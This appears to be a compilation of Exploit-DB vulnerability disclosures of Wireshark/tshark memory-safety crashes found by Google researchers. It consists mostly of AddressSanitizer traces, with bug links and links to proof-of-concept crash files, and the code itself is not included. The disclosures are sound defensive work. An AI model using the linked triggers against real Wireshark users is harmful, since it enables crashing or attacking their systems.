0x603000027b3c is located 3 bytes to the right of 25-byte region [0x603000027b20,0x603000027b39)
allocated by thread T0 here:
#0 0x4d6ff8 in __interceptor_malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7ff6f1a34610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
#2 0x870589 in iseries_read wireshark/wiretap/iseries.c:382:10
#3 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7
#4 0x535c1a in load_cap_file wireshark/tshark.c:3479:12
#5 0x52c1df in main wireshark/tshark.c:2197:13
SUMMARY: AddressSanitizer: heap-buffer-overflow wireshark/wiretap/iseries.c:820:27 in iseries_parse_packet
Shadow bytes around the buggy address:
0x0c067fffcf10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fffcf20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fffcf30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fffcf40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fffcf50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c067fffcf60: fa fa fa fa 00 00 00[01]fa fa 00 00 00 00 fa fa
0x0c067fffcf70: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00
0x0c067fffcf80: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
0x0c067fffcf90: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa
0x0c067fffcfa0: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00
0x0c067fffcfb0: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==9819==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11798. Attached is a file which triggers the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38992.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=695
The following crash due to a static out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==24377==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f7a3ce4efe0 at pc 0x7f7a39a5a121 bp 0x7ffe1fcb92e0 sp 0x7ffe1fcb92d8
READ of size 4 at 0x7f7a3ce4efe0 thread T0
#0 0x7f7a39a5a120 in hiqnet_display_data wireshark/epan/dissectors/packet-hiqnet.c:523:15
#1 0x7f7a39a59354 in dissect_hiqnet_pdu wireshark/epan/dissectors/packet-hiqnet.c:906:34
#2 0x7f7a39a560b7 in dissect_hiqnet_udp wireshark/epan/dissectors/packet-hiqnet.c:1031:9
#3 0x7f7a38ab14a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8
#4 0x7f7a38aa3e2a in call_dissector_work wireshark/epan/packet.c:694:9
#5 0x7f7a38aa35fd in dissector_try_uint_new wireshark/epan/packet.c:1151:9
#6 0x7f7a38aa41a4 in dissector_try_uint wireshark/epan/packet.c:1177:9
#7 0x7f7a3abc065d in decode_udp_ports wireshark/epan/dissectors/packet-udp.c:536:7
#8 0x7f7a3abce912 in dissect wireshark/epan/dissectors/packet-udp.c:1031:5
#9 0x7f7a3abc31a0 in dissect_udplite wireshark/epan/dissectors/packet-udp.c:1044:3
#10 0x7f7a38ab14a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8
#11 0x7f7a38aa3e2a in call_dissector_work wireshark/epan/packet.c:694:9
#12 0x7f7a38aa35fd in dissector_try_uint_new wireshark/epan/packet.c:1151:9
#13 0x7f7a39beae0b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:1976:7
#14 0x7f7a39bf5a21 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2468:10
#15 0x7f7a39beb569 in dissect_ip wireshark/epan/dissectors/packet-ip.c:2491:5
#16 0x7f7a38ab14a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8
#17 0x7f7a38aa3e2a in call_dissector_work wireshark/epan/packet.c:694:9
#18 0x7f7a38aa35fd in dissector_try_uint_new wireshark/epan/packet.c:1151:9
#19 0x7f7a38aa41a4 in dissector_try_uint wireshark/epan/packet.c:1177:9
#20 0x7f7a3a3d1830 in dissect_ppp_common wireshark/epan/dissectors/packet-ppp.c:4346:10
#21 0x7f7a3a3d0fec in dissect_ppp_hdlc_common wireshark/epan/dissectors/packet-ppp.c:5339:5
#22 0x7f7a3a3c92a5 in dissect_ppp_hdlc wireshark/epan/dissectors/packet-ppp.c:5380:5
#23 0x7f7a38ab14a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8
#24 0x7f7a38aa3e2a in call_dissector_work wireshark/epan/packet.c:694:9
#25 0x7f7a38aa35fd in dissector_try_uint_new wireshark/epan/packet.c:1151:9
#26 0x7f7a397e00d3 in dissect_frame wireshark/epan/dissectors/packet-frame.c:491:11
#27 0x7f7a38ab14a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8
#28 0x7f7a38aa3e2a in call_dissector_work wireshark/epan/packet.c:694:9
#29 0x7f7a38aad96e in call_dissector_only wireshark/epan/packet.c:2665:8
#30 0x7f7a38a9f3df in call_dissector_with_data wireshark/epan/packet.c:2678:8
#31 0x7f7a38a9ea2b in dissect_record wireshark/epan/packet.c:502:3
#32 0x7f7a38a4f9b9 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2
#33 0x52856b in process_packet wireshark/tshark.c:3728:5
#34 0x5219e0 in load_cap_file wireshark/tshark.c:3484:11
#35 0x517e2c in main wireshark/tshark.c:2197:13
0x7f7a3ce4efe0 is located 32 bytes to the left of global variable '' defined in 'packet-hiqnet.c' (0x7f7a3ce4f000) of size 16
'' is ascii string 'packet-hiqnet.c'
0x7f7a3ce4efe0 is located 16 bytes to the right of global variable 'hiqnet_datasize_per_type' defined in 'packet-hiqnet.c:282:19' (0x7f7a3ce4efa0) of size 48
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-hiqnet.c:523:15 in hiqnet_display_data
Shadow bytes around the buggy address:
0x0fefc79c1da0: f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9
0x0fefc79c1db0: f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9 00 05 f9 f9
0x0fefc79c1dc0: f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9 00 00 f9 f9
0x0fefc79c1dd0: f9 f9 f9 f9 06 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9
0x0fefc79c1de0: f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9 00 04 f9 f9
=>0x0fefc79c1df0: f9 f9 f9 f9 00 00 00 00 00 00 f9 f9[f9]f9 f9 f9
0x0fefc79c1e00: 00 00 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x0fefc79c1e10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fefc79c1e20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fefc79c1e30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fefc79c1e40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11983. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39325.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=641
The following crash due to a stack-based out-of-bounds memory read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==2067==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe26462c20 at pc 0x0000009cf704 bp 0x7ffe26462b70 sp 0x7ffe26462b68
READ of size 4 at 0x7ffe26462c20 thread T0
#0 0x9cf703 in getRate wireshark/wiretap/vwr.c:2276:20
#1 0x9c74f7 in vwr_read_s2_s3_W_rec wireshark/wiretap/vwr.c:1533:25
#2 0x9bc02a in vwr_process_rec_data wireshark/wiretap/vwr.c:2336:20
#3 0x9babf2 in vwr_read wireshark/wiretap/vwr.c:653:10
#4 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7
#5 0x535c1a in load_cap_file wireshark/tshark.c:3479:12
#6 0x52c1df in main wireshark/tshark.c:2197:13
Address 0x7ffe26462c20 is located in stack of thread T0 at offset 160 in frame
#0 0x9cf32f in getRate wireshark/wiretap/vwr.c:2261
This frame has 6 object(s):
[32, 80) 'canonical_rate_legacy'
[112, 144) 'canonical_ndbps_20_ht'
[176, 208) 'canonical_ndbps_40_ht' <== Memory access at offset 160 underflows this variable
[240, 276) 'canonical_ndbps_20_vht'
[320, 360) 'canonical_ndbps_40_vht'
[400, 440) 'canonical_ndbps_80_vht'
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow wireshark/wiretap/vwr.c:2276:20 in getRate
Shadow bytes around the buggy address:
0x100044c84530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100044c84540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100044c84550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100044c84560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100044c84570: f1 f1 f1 f1 00 00 00 00 00 00 f2 f2 f2 f2 00 00
=>0x100044c84580: 00 00 f2 f2[f2]f2 00 00 00 00 f2 f2 f2 f2 00 00
0x100044c84590: 00 00 04 f2 f2 f2 f2 f2 00 00 00 00 00 f2 f2 f2
0x100044c845a0: f2 f2 00 00 00 00 00 f3 f3 f3 f3 f3 00 00 00 00
0x100044c845b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100044c845c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100044c845d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==2067==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11789. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39006.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=643
The following crash due to a stack-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==3901==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffeadbc852d at pc 0x0000009cea23 bp 0x7ffeadbbf650 sp 0x7ffeadbbf648
READ of size 1 at 0x7ffeadbc852d thread T0
#0 0x9cea22 in find_signature wireshark/wiretap/vwr.c:2214:17
#1 0x9c5066 in vwr_read_s2_s3_W_rec wireshark/wiretap/vwr.c:1435:15
#2 0x9bc02a in vwr_process_rec_data wireshark/wiretap/vwr.c:2336:20
#3 0x9babf2 in vwr_read wireshark/wiretap/vwr.c:653:10
#4 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7
#5 0x535c1a in load_cap_file wireshark/tshark.c:3479:12
#6 0x52c1df in main wireshark/tshark.c:2197:13
Address 0x7ffeadbc852d is located in stack of thread T0 at offset 32813 in frame
#0 0x9bbbcf in vwr_process_rec_data wireshark/wiretap/vwr.c:2320
This frame has 1 object(s):
[32, 32800) 'rec' <== Memory access at offset 32813 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow wireshark/wiretap/vwr.c:2214:17 in find_signature
Shadow bytes around the buggy address:
0x100055b71050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100055b71060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100055b71070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100055b71080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100055b71090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x100055b710a0: 00 00 00 00 f3[f3]f3 f3 f3 f3 f3 f3 f3 f3 f3 f3
0x100055b710b0: f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3
0x100055b710c0: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
0x100055b710d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100055b710e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100055b710f0: f1 f1 f1 f1 04 f2 04 f3 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==3901==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11791. Attached are two files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39004.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=655
The following crash due to a stack-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==3325==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff80063d1c at pc 0x0000004aaf56 bp 0x7fff80063a50 sp 0x7fff80063200
WRITE of size 202 at 0x7fff80063d1c thread T0
#0 0x4aaf55 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
#1 0x7fb265728fad in file_read wireshark/wiretap/file_wrappers.c:1222:13
#2 0x7fb2658ae866 in wtap_read_bytes_or_eof wireshark/wiretap/wtap.c:1363:15
#3 0x7fb265783fac in mp2t_find_next_pcr wireshark/wiretap/mp2t.c:178:14
#4 0x7fb265782bfa in mp2t_bits_per_second wireshark/wiretap/mp2t.c:236:10
#5 0x7fb2657823a0 in mp2t_open wireshark/wiretap/mp2t.c:363:14
#6 0x7fb265716911 in wtap_open_offline wireshark/wiretap/file_access.c:1042:13
#7 0x51bd1d in cf_open wireshark/tshark.c:4195:9
#8 0x51584e in main wireshark/tshark.c:2188:9
Address 0x7fff80063d1c is located in stack of thread T0 at offset 220 in frame
#0 0x7fb265783cdf in mp2t_find_next_pcr wireshark/wiretap/mp2t.c:170
This frame has 1 object(s):
[32, 220) 'buffer' <== Memory access at offset 220 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy
Shadow bytes around the buggy address:
0x100070004750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100070004760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100070004770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100070004780: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 00
0x100070004790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x1000700047a0: 00 00 00[04]f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00
0x1000700047b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000700047c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000700047d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000700047e0: f1 f1 f1 f1 00 f2 f2 f2 00 f2 f2 f2 02 f2 02 f2
0x1000700047f0: 04 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==3325==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11820. Attached are two files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38997.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=806
The following crashes due to a static out-of-bounds memory read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==666==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7fa5e68bd620 at pc 0x7fa5dc525eab bp 0x7ffd5938ec40 sp 0x7ffd5938ec38
READ of size 4 at 0x7fa5e68bd620 thread T0
#0 0x7fa5dc525eaa in dissect_zcl_pwr_prof_pwrprofnotif wireshark/epan/dissectors/packet-zbee-zcl-general.c:10832:25
#1 0x7fa5dc512afc in dissect_zbee_zcl_pwr_prof wireshark/epan/dissectors/packet-zbee-zcl-general.c:10549:21
#2 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#3 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
#4 0x7fa5d9d85a1e in call_dissector_only wireshark/epan/packet.c:2764:8
#5 0x7fa5d9d768ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#6 0x7fa5dc4f777c in dissect_zbee_zcl wireshark/epan/dissectors/packet-zbee-zcl.c:881:13
#7 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#8 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
#9 0x7fa5d9d85a1e in call_dissector_only wireshark/epan/packet.c:2764:8
#10 0x7fa5d9d768ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#11 0x7fa5dc4d0d60 in dissect_zbee_apf wireshark/epan/dissectors/packet-zbee-aps.c:1705:9
#12 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#13 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
#14 0x7fa5d9d85a1e in call_dissector_only wireshark/epan/packet.c:2764:8
#15 0x7fa5d9d768ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#16 0x7fa5dc4d04fa in dissect_zbee_aps wireshark/epan/dissectors/packet-zbee-aps.c:1055:13
#17 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#18 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
#19 0x7fa5d9d85a1e in call_dissector_only wireshark/epan/packet.c:2764:8
#20 0x7fa5d9d768ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#21 0x7fa5dc4da910 in dissect_zbee_nwk_full wireshark/epan/dissectors/packet-zbee-nwk.c:732:9
#22 0x7fa5dc4d419a in dissect_zbee_nwk wireshark/epan/dissectors/packet-zbee-nwk.c:762:9
#23 0x7fa5dc4d5fb7 in dissect_zbee_nwk_heur wireshark/epan/dissectors/packet-zbee-nwk.c:409:5
#24 0x7fa5d9d83bbb in dissector_try_heuristic wireshark/epan/packet.c:2390:7
#25 0x7fa5daf6591b in dissect_ieee802154_common wireshark/epan/dissectors/packet-ieee802154.c:1524:21
#26 0x7fa5daf5756a in dissect_ieee802154_nofcs wireshark/epan/dissectors/packet-ieee802154.c:751:5
#27 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#28 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
#29 0x7fa5d9d7ad4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
#30 0x7fa5dab8c105 in dissect_frame wireshark/epan/dissectors/packet-frame.c:492:11
#31 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#32 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
#33 0x7fa5d9d85a1e in call_dissector_only wireshark/epan/packet.c:2764:8
#34 0x7fa5d9d768ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#35 0x7fa5d9d75cd4 in dissect_record wireshark/epan/packet.c:539:3
#36 0x7fa5d9d28db9 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2
#37 0x52ef3f in process_packet wireshark/tshark.c:3727:5
#38 0x52830c in load_cap_file wireshark/tshark.c:3483:11
#39 0x51e67c in main wireshark/tshark.c:2192:13
0x7fa5e68bd620 is located 32 bytes to the left of global variable 'ett_zbee_zcl_appl_ctrl_func' defined in 'packet-zbee-zcl-general.c:11520:13' (0x7fa5e68bd640) of size 128
0x7fa5e68bd620 is located 0 bytes to the right of global variable 'ett_zbee_zcl_pwr_prof_enphases' defined in 'packet-zbee-zcl-general.c:10389:13' (0x7fa5e68bd5e0) of size 64
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-zbee-zcl-general.c:10832:25 in dissect_zcl_pwr_prof_pwrprofnotif
Shadow bytes around the buggy address:
0x0ff53cd0fa70: f9 f9 f9 f9 00 00 00 f9 f9 f9 f9 f9 00 00 00 00
0x0ff53cd0fa80: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x0ff53cd0fa90: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff53cd0faa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9
0x0ff53cd0fab0: f9 f9 f9 f9 00 00 04 f9 f9 f9 f9 f9 00 00 00 00
=>0x0ff53cd0fac0: 00 00 00 00[f9]f9 f9 f9 00 00 00 00 00 00 00 00
0x0ff53cd0fad0: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 f9 f9 f9
0x0ff53cd0fae0: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff53cd0faf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff53cd0fb00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff53cd0fb10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==666==ABORTING
--- cut ---
--- cut ---
==695==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7feb11013620 at pc 0x7feb06c7b825 bp 0x7ffd6fe96b00 sp 0x7ffd6fe96af8
READ of size 4 at 0x7feb11013620 thread T0
#0 0x7feb06c7b824 in dissect_zcl_pwr_prof_enphsschednotif wireshark/epan/dissectors/packet-zbee-zcl-general.c:10745:25
#1 0x7feb06c68ba8 in dissect_zbee_zcl_pwr_prof wireshark/epan/dissectors/packet-zbee-zcl-general.c:10563:21
#2 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#3 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
#4 0x7feb044dba1e in call_dissector_only wireshark/epan/packet.c:2764:8
#5 0x7feb044cc8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#6 0x7feb06c4d77c in dissect_zbee_zcl wireshark/epan/dissectors/packet-zbee-zcl.c:881:13
#7 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#8 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
#9 0x7feb044dba1e in call_dissector_only wireshark/epan/packet.c:2764:8
#10 0x7feb044cc8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#11 0x7feb06c26d60 in dissect_zbee_apf wireshark/epan/dissectors/packet-zbee-aps.c:1705:9
#12 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#13 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
#14 0x7feb044dba1e in call_dissector_only wireshark/epan/packet.c:2764:8
#15 0x7feb044cc8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#16 0x7feb06c264fa in dissect_zbee_aps wireshark/epan/dissectors/packet-zbee-aps.c:1055:13
#17 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#18 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
#19 0x7feb044dba1e in call_dissector_only wireshark/epan/packet.c:2764:8
#20 0x7feb044cc8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#21 0x7feb06c30910 in dissect_zbee_nwk_full wireshark/epan/dissectors/packet-zbee-nwk.c:732:9
#22 0x7feb06c2a19a in dissect_zbee_nwk wireshark/epan/dissectors/packet-zbee-nwk.c:762:9
#23 0x7feb06c2bfb7 in dissect_zbee_nwk_heur wireshark/epan/dissectors/packet-zbee-nwk.c:409:5
#24 0x7feb044d9bbb in dissector_try_heuristic wireshark/epan/packet.c:2390:7
#25 0x7feb056bb91b in dissect_ieee802154_common wireshark/epan/dissectors/packet-ieee802154.c:1524:21
#26 0x7feb056ad56a in dissect_ieee802154_nofcs wireshark/epan/dissectors/packet-ieee802154.c:751:5
#27 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#28 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
#29 0x7feb044d0d4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
#30 0x7feb052e2105 in dissect_frame wireshark/epan/dissectors/packet-frame.c:492:11
#31 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#32 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
#33 0x7feb044dba1e in call_dissector_only wireshark/epan/packet.c:2764:8
#34 0x7feb044cc8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#35 0x7feb044cbcd4 in dissect_record wireshark/epan/packet.c:539:3
#36 0x7feb0447edb9 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2
#37 0x52ef3f in process_packet wireshark/tshark.c:3727:5
#38 0x52830c in load_cap_file wireshark/tshark.c:3483:11
#39 0x51e67c in main wireshark/tshark.c:2192:13
0x7feb11013620 is located 32 bytes to the left of global variable 'ett_zbee_zcl_appl_ctrl_func' defined in 'packet-zbee-zcl-general.c:11520:13' (0x7feb11013640) of size 128
0x7feb11013620 is located 0 bytes to the right of global variable 'ett_zbee_zcl_pwr_prof_enphases' defined in 'packet-zbee-zcl-general.c:10389:13' (0x7feb110135e0) of size 64
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-zbee-zcl-general.c:10745:25 in dissect_zcl_pwr_prof_enphsschednotif
Shadow bytes around the buggy address:
0x0ffde21fa670: f9 f9 f9 f9 00 00 00 f9 f9 f9 f9 f9 00 00 00 00
0x0ffde21fa680: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x0ffde21fa690: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x0ffde21fa6a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9
0x0ffde21fa6b0: f9 f9 f9 f9 00 00 04 f9 f9 f9 f9 f9 00 00 00 00
=>0x0ffde21fa6c0: 00 00 00 00[f9]f9 f9 f9 00 00 00 00 00 00 00 00
0x0ffde21fa6d0: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 f9 f9 f9
0x0ffde21fa6e0: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
